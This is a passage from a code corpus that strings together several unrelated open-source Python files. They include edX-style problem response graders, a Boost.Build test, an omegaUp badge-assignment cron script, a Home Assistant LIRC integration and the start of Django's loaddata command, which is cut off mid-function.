_("factorial function not permitted in answer "
"for this problem. Provided answer was: "
"{bad_input}").format(bad_input=cgi.escape(answer))
)
# If non-factorial related ValueError thrown, handle it the same as any other Exception
log.debug('formularesponse: error %s in formula', err)
raise StudentInputError(
_("Invalid input: Could not parse '{bad_input}' as a formula.").format(
bad_input=cgi.escape(answer)
)
)
except Exception as err:
# traceback.print_exc()
log.debug('formularesponse: error %s in formula', err)
raise StudentInputError(
_("Invalid input: Could not parse '{bad_input}' as a formula").format(
bad_input=cgi.escape(answer)
)
)
return out
def randomize_variables(self, samples):
"""
Returns a list of dictionaries mapping variables to random values in range,
as expected by tupleize_answers.
"""
variables = samples.split('@')[0].split(',')
numsamples = int(samples.split('@')[1].split('#')[1])
sranges = zip(*map(lambda x: map(float, x.split(",")),
samples.split('@')[1].split('#')[0].split(':')))
ranges = dict(zip(variables, sranges))
out = []
for _ in range(numsamples):
var_dict = {}
# ranges give numerical ranges for testing
for var in ranges:
# TODO: allow specified ranges (i.e. integers and complex numbers) for random variables
value = random.uniform(*ranges[var])
var_dict[str(var)] = value
out.append(var_dict)
return out
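# Worked example of the samples format parsed above (a sketch):
#
#     samples = "x,y@1,2:3,4#10"
#
# parses to variables ['x', 'y'], lower bounds (1, 2), upper bounds (3, 4)
# and numsamples 10, i.e. ten dicts with x drawn uniformly from [1, 3] and
# y from [2, 4].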
def check_formula(self, expected, given, samples):
"""
Given an expected answer string, a given (student-produced) answer
string, and a samples string, return whether the given answer is
"correct" or "incorrect".
"""
var_dict_list = self.randomize_variables(samples)
student_result = self.tupleize_answers(given, var_dict_list)
instructor_result = self.tupleize_answers(expected, var_dict_list)
correct = all(compare_with_tolerance(student, instructor, self.tolerance)
for student, instructor in zip(student_result, instructor_result))
if correct:
return "correct"
else:
return "incorrect"
def compare_answer(self, ans1, ans2):
"""
An external interface for comparing whether a and b are equal.
"""
internal_result = self.check_formula(ans1, ans2, self.samples)
return internal_result == "correct"
def validate_answer(self, answer):
"""
Returns whether this answer is in a valid form.
"""
var_dict_list = self.randomize_variables(self.samples)
try:
self.tupleize_answers(answer, var_dict_list)
return True
except StudentInputError:
return False
def strip_dict(self, inp_d):
"""
Takes a dict. Returns an identical dict, with all non-word
keys and all non-numeric values stripped out. All values are also
converted to complex. Used so we can safely use Python contexts.
"""
inp_d = dict([(k, numpy.complex(inp_d[k]))
for k in inp_d if isinstance(k, str) and
k.isalnum() and
isinstance(inp_d[k], numbers.Number)])
return inp_d
def check_hint_condition(self, hxml_set, student_answers):
given = student_answers[self.answer_id]
hints_to_show = []
for hxml in hxml_set:
samples = hxml.get('samples')
name = hxml.get('name')
correct_answer = contextualize_text(
hxml.get('answer'), self.context)
# pylint: disable=broad-except
try:
correctness = self.check_formula(
correct_answer,
given,
samples
)
except Exception:
correctness = 'incorrect'
if correctness == 'correct':
hints_to_show.append(name)
log.debug('hints_to_show = %s', hints_to_show)
return hints_to_show
def get_answers(self):
return {self.answer_id: self.correct_answer}
#-----------------------------------------------------------------------------
@registry.register
class SchematicResponse(LoncapaResponse):
"""
Circuit schematic response type.
"""
human_name = _('Circuit Schematic Builder')
tags = ['schematicresponse']
allowed_inputfields = ['schematic']
def __init__(self, *args, **kwargs):
self.code = ''
super(SchematicResponse, self).__init__(*args, **kwargs)
def setup_response(self):
xml = self.xml
answer = xml.xpath('//*[@id=$id]//answer', id=xml.get('id'))[0]
answer_src = answer.get('src')
if answer_src is not None:
# Untested; never used
self.code = self.capa_system.filestore.open('src/' + answer_src).read()
else:
self.code = answer.text
def get_score(self, student_answers):
#from capa_problem import global_context
submission = [
json.loads(student_answers[k]) for k in sorted(self.answer_ids)
]
self.context.update({'submission': submission})
try:
safe_exec.safe_exec(
self.code,
self.context,
cache=self.capa_system.cache,
python_path=self.context['python_path'],
extra_files=self.context['extra_files'],
slug=self.id,
random_seed=self.context['seed'],
unsafely=self.capa_system.can_execute_unsafe_code(),
)
except Exception as err:
_ = self.capa_system.i18n.ugettext
# Translators: 'SchematicResponse' is a problem type and should not be translated.
msg = _('Error in evaluating SchematicResponse. The error was: {error_msg}').format(error_msg=err)
raise ResponseError(msg)
cmap = CorrectMap()
cmap.set_dict(dict(zip(sorted(self.answer_ids), self.context['correct'])))
return cmap
def get_answers(self):
# use answers provided in input elements
return self.default_answer_map
#-----------------------------------------------------------------------------
@registry.register
class ImageResponse(LoncapaResponse):
"""
Handle student response for image input: the input is a click on an image,
which produces an [x,y] coordinate pair. The click is correct if it falls
within a region specified. This region is a union of rectangles.
Lon-CAPA requires that each <imageresponse> has a <foilgroup> inside it.
That doesn't make sense to me (Ike). Instead, let's have it such that
<imageresponse> should contain one or more <imageinput> stanzas.
Each <imageinput> should specify a rectangle(s) or region(s), given as an
attribute, defining the correct answer.
<imageinput src="/static/images/Lecture2/S2_p04.png" width="811" height="610"
rectangle="(10,10)-(20,30);(12,12)-(40,60)"
regions="[[[10,10], [20,30], [40, 10]], [[100,100], [120,130], [110,150]]]"/>
Regions is a list of lists [region1, region2, region3, ...] where regionN
is an unordered list of points: [[1,1], [100,100], [50,50], [20, 70]].
If there is only one region in the list, a simpler notation can be used:
regions="[[10,10], [30,30], [10, 30], [30, 10]]" (without explicitly
nesting it in an outer list)
Returns:
True, if click is inside any region or rectangle. Otherwise False.
"""
human_name = _('Image Mapped Input')
tags = ['imageresponse']
allowed_inputfields = ['imageinput']
def __init__(self, *args, **kwargs):
self.ielements = []
super(ImageResponse, self).__init__(*args, **kwargs)
def setup_response(self):
self.ielements = self.inputfields
self.answer_ids = [ie.get('id') for ie in self.ielements]
def get_score(self, student_answers):
_ = self.capa_system.i18n.ugettext
correct_map = CorrectMap()
expectedset = self.get_mapped_answers()
for aid in self.answer_ids: # loop through IDs of <imageinput>
# Fields in our stanza
given = student_answers[aid] # This should be a string of the form '[x,y]'
correct_map.set(aid, 'incorrect')
if not given: # No answer to parse. Mark as incorrect and move on
continue
# Parse given answer
acoords = re.match(r'\[([0-9]+),([0-9]+)]', given.strip().replace(' ', ''))
if not acoords:
msg = _('error grading {image_input_id} (input={user_input})').format(
image_input_id=aid,
user_input=given
)
raise Exception('[capamodule.capa.responsetypes.imageinput] ' + msg)
(ans_x, ans_y) = [int(x) for x in acoords.groups()]
rectangles, regions = expectedset
if rectangles[aid]: # Rectangles part - for backward compatibility
# Check whether given point lies in any of the solution
# rectangles
solution_rectangles = rectangles[aid].split(';')
for solution_rectangle in solution_rectangles:
# parse expected answer
# TODO: Compile regexp on file load
sr_coords = re.match(
r'[\(\[]([0-9]+),([0-9]+)[\)\]]-[\(\[]([0-9]+),([0-9]+)[\)\]]',
solution_rectangle.strip().replace(' ', ''))
if not sr_coords:
# Translators: {sr_coords} are the coordinates of a rectangle
msg = _('Error in problem specification! Cannot parse rectangle in {sr_coords}').format(
sr_coords=etree.tostring(self.ielements[aid], pretty_print=True)
)
raise Exception('[capamodule.capa.responsetypes.imageinput] ' + msg)
(llx, lly, urx, ury) = [int(x) for x in sr_coords.groups()]
# answer is correct if (x,y) is within the specified
# rectangle
if (llx <= ans_x <= urx) and (lly <= ans_y <= ury):
correct_map.set(aid, 'correct')
break
if correct_map[aid]['correctness'] != 'correct' and regions[aid]:
parsed_region = json.loads(regions[aid])
if parsed_region:
if not isinstance(parsed_region[0][0], list):
# we have [[1,2],[3,4],[5,6]] - single region
# instead of [[[1,2],[3,4],[5,6], [[1,2],[3,4],[5,6]]]
# or [[[1,2],[3,4],[5,6]]] - multiple regions syntax
parsed_region = [parsed_region]
for region in parsed_region:
polygon = MultiPoint(region).convex_hull
if (polygon.type == 'Polygon' and
polygon.contains(Point(ans_x, ans_y))):
correct_map.set(aid, 'correct')
break
return correct_map
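# Worked example of the grading above (a sketch). For
#
#     rectangle="(10,10)-(20,30)"
#
# a click of '[15,20]' parses to (15, 20) and satisfies 10 <= 15 <= 20 and
# 10 <= 20 <= 30, so the input is marked 'correct'; a click of '[25,20]'
# fails the x check and, with no regions defined, stays 'incorrect'.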
def get_mapped_answers(self):
"""
Returns the internal representation of the answers
Input:
None
Returns:
tuple (dict, dict) -
rectangles (dict) - a map of inputs to the defined rectangle for that input
regions (dict) - a map of inputs to the defined region for that input
"""
answers = (
dict([(ie.get('id'), ie.get(
'rectangle')) for ie in self.ielements]),
dict([(ie.get('id'), ie.get('regions')) for ie in self.ielements]))
return answers
def get_answers(self):
"""
Returns the external representation of the answers
Input:
None
Returns:
dict (str: dict) - a map of input ids to a dict holding their
'rectangle' and 'regions' attributes
"""
answers = {}
for ielt in self.ielements:
ie_id = ielt.get('id')
answers[ie_id] = {'rectangle': ielt.get('rectangle'), 'regions': ielt.get('regions')}
return answers
#-----------------------------------------------------------------------------
@registry.register
class AnnotationResponse(LoncapaResponse):
"""
Checking of annotation responses.
The response contains both a comment (student commentary) and an option (student tag).
Only the tag is currently graded. Answers may be incorrect, partially correct, or correct.
"""
human_name = _('Annotation Input')
tags = ['annotationresponse']
allowed_inputfields = ['annotationinput']
max_inputfields = 1
default_scoring = {'incorrect': 0, 'partially-correct': 1, 'correct': 2}
def __init__(self, *args, **kwargs):
self.scoring_map = {}
self.answer_map = {}
super(AnnotationResponse, self).__init__(*args, **kwargs)
def setup_response(self):
self.scoring_map = self._get_scoring_map()
self.answer_map = self._get_answer_map()
self.maxpoints = self._get_max_points()
def get_score(self, student_answers):
"""
Returns a CorrectMap for the student answer, which may include
partially correct answers.
"""
student_answer = student_answers[self.answer_id]
student_option = self._get_submitted_option_id(student_answer)
scoring = self.scoring_map[self.answer_id]
is_valid = student_option is not None and student_option in scoring
(correctness, points) = ('incorrect', None)
if is_valid:
correctness = scoring[student_option]['correctness']
points = scoring[student_option]['points']
return CorrectMap(self.answer_id, correctness=correctness, npoints=points)
def get_answers(self):
return self.answer_map
def _get_scoring_map(self):
"""Returns a dict of option->scoring for each input."""
scoring = self.default_scoring
choices = dict([(choice, choice) for choice in scoring])
scoring_map = {}
for inputfield in self.inputfields:
option_scoring = dict([(
option['id'],
{
'correctness': choices.get(option['choice']),
'points': scoring.get(option['choice'])
}
) for option in self._find_options(inputfield)])
scoring_map[inputfield.get('id')] = option_scoring
return scoring_map
def _get_answer_map(self):
"""Returns a dict of answers for each input."""
answer_map = {}
for inputfield in self.inputfields:
correct_option = self._find_option_with_choice(
inputfield, 'correct')
if correct_option is not None:
input_id = inputfield.get('id')
answer_map[input_id] = correct_option.get('description')
return answer_map
def _get_max_points(self):
"""Returns a dict of the max points for each input: input id -> maxpoints."""
scoring = self.default_scoring
correct_points = scoring.get('correct')
return dict([(inputfield.get('id'), correct_points) for inputfield in self.inputfields])
def _find_options(self, inputfield):
"""Returns an array of dicts where each dict represents an option. """
elements = inputfield.findall('./options/option')
return [{
'id': index,
'description': option.text,
'choice': option.get('choice')
} for (index, option) in enumerate(elements)]
def _find_option_with_choice(self, inputfield, choice):
"""Returns the option with the given choice value, otherwise None. """
for option in self._find_options(inputfield):
if option['choice'] == choice:
return option
def _unpack(self, json_value):
"""Unpacks a student response value submitted as JSON."""
json_d = json.loads(json_value)
if not isinstance(json_d, dict):
json_d = {}
comment_value = json_d.get('comment', '')
if not isinstance(comment_value, basestring):
comment_value = ''
options_value = json_d.get('options', [])
if not isinstance(options_value, list):
options_value = []
return {
'options_value': options_value,
'comment_value': comment_value
}
def _get_submitted_option_id(self, student_answer):
"""Return the single option that was selected, otherwise None."""
submitted = self._unpack(student_answer)
option_ids = submitted['options_value']
if len(option_ids) == 1:
return option_ids[0]
return None
@registry.register
class ChoiceTextResponse(LoncapaResponse):
"""
Allows for multiple choice responses with text inputs
Desired semantics match those of NumericalResponse and
ChoiceResponse.
"""
human_name = _('Checkboxes With Text Input')
tags = ['choicetextresponse']
max_inputfields = 1
allowed_inputfields = ['choicetextgroup',
'checkboxtextgroup',
'radiotextgroup'
]
def __init__(self, *args, **kwargs):
self.correct_inputs = {}
self.answer_values = {}
self.correct_choices = {}
super(ChoiceTextResponse, self).__init__(*args, **kwargs)
def setup_response(self):
"""
Sets up three dictionaries for use later:
`correct_choices`: These are the correct binary choices(radio/checkbox)
`correct_inputs`: These are the numerical/string answers for required
inputs.
`answer_values`: This is a dict, keyed by the name of the binary choice
which contains the correct answers for the text inputs separated by
commas e.g. "1, 0.5"
`correct_choices` and `correct_inputs` are used for grading the problem
and `answer_values` is used for displaying correct answers.
"""
_ = self.capa_system.i18n.ugettext
context = self.context
self.answer_values = {self.answer_id: []}
self.assign_choice_names()
correct_xml = self.xml.xpath('//*[@id=$id]//choice[@correct="true"]',
id=self.xml.get('id'))
for node in correct_xml:
# For each correct choice, set the `parent_name` to the
# current choice's name
parent_name = node.get('name')
# Add the name of the correct binary choice to the
# correct choices list as a key. The value is not important.
self.correct_choices[parent_name] = {'answer': ''}
# Add the name of the parent to the list of correct answers
self.answer_values[self.answer_id].append(parent_name)
answer_list = []
# Loop over <numtolerance_input> elements inside of the correct choices
for child in node:
answer = child.get('answer', None)
if not answer:
# If the question creator does not specify an answer for a
# <numtolerance_input> inside of a correct choice, raise an error
raise LoncapaProblemError(
_("Answer not provided for {input_type}").format(input_type="numtolerance_input")
)
# Contextualize the answer to allow script generated answers.
answer = contextualize_text(answer, context)
input_name = child.get('name')
# Contextualize the tolerance to value.
tolerance = contextualize_text(
child.get('tolerance', default_tolerance),
context
)
# Add the answer and tolerance information for the current
# numtolerance_input to `correct_inputs`
self.correct_inputs[input_name] = {
'answer': answer,
'tolerance': tolerance
}
# Add the correct answer for this input to the list for show
answer_list.append(answer)
# Turn the list of numtolerance_input answers into a comma separated string.
self.answer_values[parent_name] = ', '.join(answer_list)
# Turn correct choices into a set. Allows faster grading.
self.correct_choices = set(self.correct_choices.keys())
def assign_choice_names(self):
"""
Initialize name attributes in <choice> and <numtolerance_input> tags
for this response.
Example:
Assuming for simplicity that `self.answer_id` = '1_2_1'
Before the function is called `self.xml` =
<radiotextgroup>
<choice correct = "true">
The number
<numtolerance_input answer="5"/>
Is the mean of the list.
</choice>
<choice correct = "false">
False demonstration choice
</choice>
</radiotextgroup>
After this is called the choices and numtolerance_inputs will have a name
attribute initialized and self.xml will be:
<radiotextgroup>
<choice correct = "true" name ="1_2_1_choiceinput_0bc">
The number
<numtolerance_input name = "1_2_1_choiceinput0_numtolerance_input_0"
answer="5"/>
Is the mean of the list.
</choice>
<choice correct = "false" name = "1_2_1_choiceinput_1bc>
False demonstration choice
</choice>
</radiotextgroup>
"""
for index, choice in enumerate(
self.xml.xpath('//*[@id=$id]//choice', id=self.xml.get('id'))
):
# Set the name attribute for <choices>
# "bc" is appended at the end to indicate that this is a
# binary choice, as opposed to a numtolerance_input; this convention
# is used when grading the problem
choice.set(
"name",
self.answer_id + "_choiceinput_" + str(index) + "bc"
)
# Set Name attributes for <numtolerance_input> elements
# Look for all <numtolerance_inputs> inside this choice.
numtolerance_inputs = choice.findall('numtolerance_input')
# Look for all <decoy_input> inside this choice
decoys = choice.findall('decoy_input')
# <decoy_input> would only be used in choices which do not contain
# <numtolerance_input>
inputs = numtolerance_inputs if numtolerance_inputs else decoys
# Give each input inside of the choice a name combining
# The ordinality of the choice, and the ordinality of the input
# within that choice e.g. 1_2_1_choiceinput_0_numtolerance_input_1
for ind, child in enumerate(inputs):
child.set(
"name",
self.answer_id + "_choiceinput_" + str(index) +
"_numtolerance_input_" + str(ind)
)
def get_score(self, student_answers):
"""
Returns a `CorrectMap` showing whether `student_answers` are correct.
`student_answers` contains keys for binary inputs (radiobutton,
checkbox) and numerical inputs. Keys ending with 'bc' are binary
choice inputs; otherwise they are text fields.
This method first separates the two
types of answers and then grades them in separate methods.
The student is only correct if they have both the binary inputs and
numerical inputs correct.
"""
answer_dict = student_answers.get(self.answer_id, "")
binary_choices, numtolerance_inputs = self._split_answers_dict(answer_dict)
# Check the binary choices first.
choices_correct = self._check_student_choices(binary_choices)
inputs_correct = self._check_student_inputs(numtolerance_inputs)
# Only return correct if both the binary choices and the
# numtolerance_inputs are correct
correct = choices_correct and inputs_correct
return CorrectMap(
self.answer_id,
'correct' if correct else 'incorrect'
)
def get_answers(self):
"""
Returns a dictionary containing the names of binary choices as keys
and a string of answers to any numtolerance_inputs which they may have
e.g {choice_1bc : "answer1, answer2", choice_2bc : ""}
"""
return self.answer_values
def _split_answers_dict(self, a_dict):
"""
Returns two dicts:
`binary_choices` : dictionary {input_name: input_value} for
the binary choices which the student selected.
and
`numtolerance_choices` : a dictionary {input_name: input_value}
for the numtolerance_inputs inside of choices which were selected
Determines if an input is inside of a binary input by looking at
the beginning of its name.
For example, if a binary_choice was named '1_2_1_choiceinput_0bc',
all of the numtolerance_inputs in it would have a name that begins
with '1_2_1_choice_input_0_numtolerance_input'
Splits the name of the numtolerance_input at the occurrence of
'_numtolerance_input_' and appends 'bc' to the end to get the name
of the choice it is contained in.
Example:
`a_dict` = {
'1_2_1_choiceinput_0bc': '1_2_1_choiceinput_0bc',
'1_2_1_choiceinput_0_numtolerance_input_0': '1',
'1_2_1_choiceinput_0_numtolerance_input_1': '2'
'1_2_1_choiceinput_1_numtolerance_input_0': '3'
}
In this case, the binary choice is '1_2_1_choiceinput_0bc', and
the numtolerance_inputs associated with it are
'1_2_1_choiceinput_0_numtolerance_input_0', and
'1_2_1_choiceinput_0_numtolerance_input_1'.
so the two return dictionaries would be
`binary_choices` = {'1_2_1_choiceinput_0bc': '1_2_1_choiceinput_0bc'}
and
`numtolerance_choices` ={
'1_2_1_choiceinput_0_numtolerance_input_0': '1',
'1_2_1_choiceinput_0_numtolerance_input_1': '2'
}
The entry '1_2_1_choiceinput_1_numtolerance_input_0': '3' is discarded
because it was not inside of a selected binary choice, and no validation
should be performed on numtolerance_inputs inside of non-selected choices.
"""
# Initialize the two dictionaries that are returned
numtolerance_choices = {}
binary_choices = {}
# `selected_choices` is a list of binary choices which were "checked/selected"
# when the student submitted the problem.
# Keys in a_dict ending with 'bc' refer to binary choices.
selected_choices = [key for key in a_dict if key.endswith("bc")]
for key in selected_choices:
binary_choices[key] = a_dict[key]
# Convert the name of a numtolerance_input into the name of the binary
# choice that it is contained within, and append it to the list if
# the numtolerance_input's parent binary_choice is contained in
# `selected_choices`.
selected_numtolerance_inputs = [
key for key in a_dict if key.partition("_numtolerance_input_")[0] + "bc"
in selected_choices
]
for key in selected_numtolerance_inputs:
numtolerance_choices[key] = a_dict[key]
return (binary_choices, numtolerance_choices)
def _check_student_choices(self, choices):
"""
Compares student submitted checkbox/radiobutton answers against
the correct answers. Returns True or False.
True if all of the correct choices are selected and no incorrect
choices are selected.
"""
student_choices = set(choices)
required_selected = len(self.correct_choices - student_choices) == 0
no_extra_selected = len(student_choices - self.correct_choices) == 0
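        # Both set differences being empty is equivalent to set equality:
        # e.g. if correct_choices is {'1_2_1_choiceinput_0bc'} (hypothetical),
        # the student must select exactly that choice and nothing else.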
correct = required_selected and no_extra_selected
return correct
def _check_student_inputs(self, numtolerance_inputs):
"""
Compares student submitted numerical answers against the correct
answers and tolerances.
`numtolerance_inputs` is a dictionary {answer_name : answer_value}
Performs numerical validation by means of calling
`compare_with_tolerance()` on all of `numtolerance_inputs`
Performs a call to `compare_with_tolerance` even on values for
decoy_inputs. This is used to validate their numericality and
        raise an error if the student entered a non-numerical expression.
Returns True if and only if all student inputs are correct.
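        Example (hypothetical names): given
            correct_inputs = {'1_2_1_choiceinput_0_numtolerance_input_0':
                              {'answer': '5', 'tolerance': '10%'}}
        a submitted value of '5.2' for that input is within tolerance and
        is correct, while '6' is not.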
"""
_ = self.capa_system.i18n.ugettext
inputs_correct = True
for answer_name, answer_value in numtolerance_inputs.iteritems():
            # If `self.correct_inputs` does not contain an entry for
# `answer_name`, this means that answer_name is a decoy
# input's value, and validation of its numericality is the
# only thing of interest from the later call to
# `compare_with_tolerance`.
params = self.correct_inputs.get(answer_name, {'answer': 0})
correct_ans = params['answer']
            # Fall back to the module-level default_tolerance if none was
            # specified in the xml.
tolerance = params.get('tolerance', default_tolerance)
# Make sure that the staff answer is a valid number
try:
correct_ans = complex(correct_ans)
except ValueError:
log.debug(
"Content error--answer '%s' is not a valid complex number",
correct_ans
)
raise StudentInputError(
_("The Staff answer could not be interpreted as a number.")
)
            # Compare the student answer to the staff answer, or to 0 if
            # only the numericality of the input needs to be verified.
try:
partial_correct = compare_with_tolerance(
evaluator({}, {}, answer_value),
correct_ans,
tolerance
)
            except Exception:
                # Re-raise as a StudentInputError, keeping information about
                # the original traceback in the error message.
__, __, trace = sys.exc_info()
msg = _("Could not interpret '{given_answer}' as a number.").format(
given_answer=cgi.escape(answer_value)
)
msg += " ({0})".format(trace)
raise StudentInputError(msg)
            # Ignore the results of comparisons that were performed only
            # for numerical validation of decoy inputs.
if answer_name in self.correct_inputs and not partial_correct:
# If any input is not correct, set the return value to False
inputs_correct = False
return inputs_correct
#-----------------------------------------------------------------------------
# TEMPORARY: List of all response subclasses
# FIXME: To be replaced by auto-registration
# pylint: disable=invalid-all-object
__all__ = [
CodeResponse,
NumericalResponse,
FormulaResponse,
CustomResponse,
SchematicResponse,
ExternalResponse,
ImageResponse,
OptionResponse,
SymbolicResponse,
StringResponse,
ChoiceResponse,
MultipleChoiceResponse,
TrueFalseResponse,
JavascriptResponse,
AnnotationResponse,
ChoiceTextResponse,
]
# pylint: enable=invalid-all-object
|
biospi/seamass-windeps
|
refs/heads/master
|
src/boost_1_57_0/tools/build/test/core_d12.py
|
45
|
#!/usr/bin/python
# Copyright 2002, 2003 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
# This tests correct handling of "-d1" and "-d2" options.
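# In short: "-d0" suppresses all action output, "-d1" echoes only regular
# (non-quiet) action names, and "-d2" echoes quietly-declared actions too.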
import BoostBuild
t = BoostBuild.Tester(["-ffile.jam"], pass_d0=False, pass_toolset=0)
t.write("file.jam", """\
actions a { }
actions quietly b { }
ALWAYS all ;
a all ;
b all ;
""")
t.run_build_system(["-d0"], stdout="")
t.run_build_system(["-d1"])
t.expect_output_lines("a all")
t.expect_output_lines("b all", False)
t.run_build_system(["-d2"])
t.expect_output_lines("a all")
t.expect_output_lines("b all")
t.cleanup()
|
samdsmx/omegaup
|
refs/heads/master
|
stuff/cron/assign_badges.py
|
2
|
#!/usr/bin/python3
'''Assigns badges to users and creates the corresponding notifications.'''
import argparse
import datetime
import json
import logging
import os
import sys
from typing import Optional, Set
import MySQLdb
sys.path.insert(
0,
os.path.join(
os.path.dirname(os.path.dirname(os.path.realpath(__file__))), "."))
import lib.db # pylint: disable=wrong-import-position
import lib.logs # pylint: disable=wrong-import-position
BADGES_PATH = os.path.abspath(os.path.join(__file__, '..', '..',
'..', 'frontend/badges'))
def get_all_owners(badge: str, current_timestamp: Optional[datetime.datetime],
cur: MySQLdb.cursors.DictCursor) -> Set[int]:
'''Returns a set of ids of users who should receive the badge'''
with open(os.path.join(BADGES_PATH, badge, 'query.sql')) as fd:
query = fd.read()
if current_timestamp is not None:
query = query.replace(
'NOW()', f"'{current_timestamp.strftime('%Y-%m-%d %H:%M:%S')}'")
cur.execute(query)
results = set()
for row in cur:
results.add(row['user_id'])
return results
def get_current_owners(badge: str,
cur: MySQLdb.cursors.DictCursor) -> Set[int]:
'''Returns a set of ids of current badge owners'''
cur.execute('''
SELECT
ub.user_id
FROM
Users_Badges ub
WHERE
ub.badge_alias = '%s';''' % badge)
results = set()
for row in cur:
results.add(row['user_id'])
return results
def save_new_owners(badge: str, users: Set[int],
cur: MySQLdb.cursors.DictCursor) -> None:
'''Adds new badge owners entries to Users_Badges table'''
badges_tuples = []
notifications_tuples = []
for user in users:
badges_tuples.append((user, badge))
notifications_tuples.append((
user, json.dumps({'type': 'badge', 'badge': badge})))
cur.executemany('''
INSERT INTO
Users_Badges (user_id, badge_alias)
VALUES (%s, %s);''', badges_tuples)
cur.executemany('''
INSERT INTO
Notifications (user_id, contents)
VALUES (%s, %s)''', notifications_tuples)
def process_badges(current_timestamp: Optional[datetime.datetime],
cur: MySQLdb.cursors.DictCursor) -> None:
'''Processes all badges'''
badges = [f.name for f in os.scandir(BADGES_PATH) if f.is_dir()]
for badge in badges:
logging.info('==== Badge %s ====', badge)
try:
all_owners = get_all_owners(badge, current_timestamp, cur)
current_owners = get_current_owners(badge, cur)
new_owners = all_owners - current_owners
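            # Only users who qualify now but do not yet own the badge get
            # new Users_Badges rows and notifications.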
logging.info('New owners: %s', new_owners)
if new_owners:
save_new_owners(badge, new_owners, cur)
except: # noqa: bare-except
logging.exception('Something went wrong with badge: %s.', badge)
raise
def main() -> None:
'''Main entrypoint.'''
parser = argparse.ArgumentParser(
description='Assign badges and create notifications.')
parser.add_argument(
'--current-timestamp',
type=lambda s: datetime.datetime.strptime(s, '%Y-%m-%d %H:%M:%S'))
lib.db.configure_parser(parser)
lib.logs.configure_parser(parser)
args = parser.parse_args()
lib.logs.init(parser.prog, args)
logging.info('Started')
dbconn = lib.db.connect(args)
try:
with dbconn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cur:
process_badges(args.current_timestamp, cur) # type: ignore
dbconn.commit()
finally:
dbconn.close()
logging.info('Finished')
if __name__ == '__main__':
main()
|
pschmitt/home-assistant
|
refs/heads/dev
|
homeassistant/components/lirc/__init__.py
|
18
|
"""Support for LIRC devices."""
# pylint: disable=no-member, import-error
import logging
import threading
import time
import lirc
import voluptuous as vol
from homeassistant.const import EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP
_LOGGER = logging.getLogger(__name__)
BUTTON_NAME = "button_name"
DOMAIN = "lirc"
EVENT_IR_COMMAND_RECEIVED = "ir_command_received"
ICON = "mdi:remote"
CONFIG_SCHEMA = vol.Schema({DOMAIN: vol.Schema({})}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Set up the LIRC capability."""
# blocking=True gives unexpected behavior (multiple responses for 1 press)
# also by not blocking, we allow hass to shut down the thread gracefully
# on exit.
lirc.init("home-assistant", blocking=False)
lirc_interface = LircInterface(hass)
def _start_lirc(_event):
lirc_interface.start()
def _stop_lirc(_event):
lirc_interface.stopped.set()
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, _start_lirc)
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, _stop_lirc)
return True
class LircInterface(threading.Thread):
"""
This interfaces with the lirc daemon to read IR commands.
When using lirc in blocking mode, sometimes repeated commands get produced
in the next read of a command so we use a thread here to just wait
around until a non-empty response is obtained from lirc.
"""
def __init__(self, hass):
"""Construct a LIRC interface object."""
threading.Thread.__init__(self)
self.daemon = True
self.stopped = threading.Event()
self.hass = hass
def run(self):
"""Run the loop of the LIRC interface thread."""
_LOGGER.debug("LIRC interface thread started")
while not self.stopped.isSet():
try:
code = lirc.nextcode() # list; empty if no buttons pressed
except lirc.NextCodeError:
_LOGGER.warning("Error reading next code from LIRC")
code = None
# interpret result from python-lirc
if code:
code = code[0]
_LOGGER.info("Got new LIRC code %s", code)
self.hass.bus.fire(EVENT_IR_COMMAND_RECEIVED, {BUTTON_NAME: code})
else:
time.sleep(0.2)
lirc.deinit()
_LOGGER.debug("LIRC interface thread stopped")
|
Work4Labs/lettuce
|
refs/heads/master
|
tests/integration/lib/Django-1.2.5/django/core/management/commands/loaddata.py
|
44
|
import sys
import os
import gzip
import zipfile
from optparse import make_option
from django.conf import settings
from django.core import serializers
from django.core.management.base import BaseCommand
from django.core.management.color import no_style
from django.db import connections, router, transaction, DEFAULT_DB_ALIAS
from django.db.models import get_apps
from django.utils.itercompat import product
try:
import bz2
has_bz2 = True
except ImportError:
has_bz2 = False
class Command(BaseCommand):
help = 'Installs the named fixture(s) in the database.'
args = "fixture [fixture ...]"
option_list = BaseCommand.option_list + (
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a specific database to load '
'fixtures into. Defaults to the "default" database.'),
)
def handle(self, *fixture_labels, **options):
using = options.get('database', DEFAULT_DB_ALIAS)
connection = connections[using]
self.style = no_style()
verbosity = int(options.get('verbosity', 1))
show_traceback = options.get('traceback', False)
# commit is a stealth option - it isn't really useful as
# a command line option, but it can be useful when invoking
# loaddata from within another script.
# If commit=True, loaddata will use its own transaction;
# if commit=False, the data load SQL will become part of
# the transaction in place when loaddata was invoked.
commit = options.get('commit', True)
# Keep a count of the installed objects and fixtures
fixture_count = 0
loaded_object_count = 0
fixture_object_count = 0
models = set()
humanize = lambda dirname: dirname and "'%s'" % dirname or 'absolute path'
# Get a cursor (even though we don't need one yet). This has
# the side effect of initializing the test database (if
# it isn't already initialized).
cursor = connection.cursor()
# Start transaction management. All fixtures are installed in a
# single transaction to ensure that all references are resolved.
if commit:
transaction.commit_unless_managed(using=using)
transaction.enter_transaction_management(using=using)
transaction.managed(True, using=using)
class SingleZipReader(zipfile.ZipFile):
def __init__(self, *args, **kwargs):
zipfile.ZipFile.__init__(self, *args, **kwargs)
if settings.DEBUG:
assert len(self.namelist()) == 1, "Zip-compressed fixtures must contain only one file."
def read(self):
return zipfile.ZipFile.read(self, self.namelist()[0])
compression_types = {
None: file,
'gz': gzip.GzipFile,
'zip': SingleZipReader
}
if has_bz2:
compression_types['bz2'] = bz2.BZ2File
app_module_paths = []
for app in get_apps():
if hasattr(app, '__path__'):
# It's a 'models/' subpackage
for path in app.__path__:
app_module_paths.append(path)
else:
# It's a models.py module
app_module_paths.append(app.__file__)
app_fixtures = [os.path.join(os.path.dirname(path), 'fixtures') for path in app_module_paths]
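        # A fixture label such as "initial_data.json.gz" (hypothetical) splits
        # into the name "initial_data", the serialization format "json" and
        # the compression format "gz"; bare names try every known combination.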
for fixture_label in fixture_labels:
parts = fixture_label.split('.')
if len(parts) > 1 and parts[-1] in compression_types:
compression_formats = [parts[-1]]
parts = parts[:-1]
else:
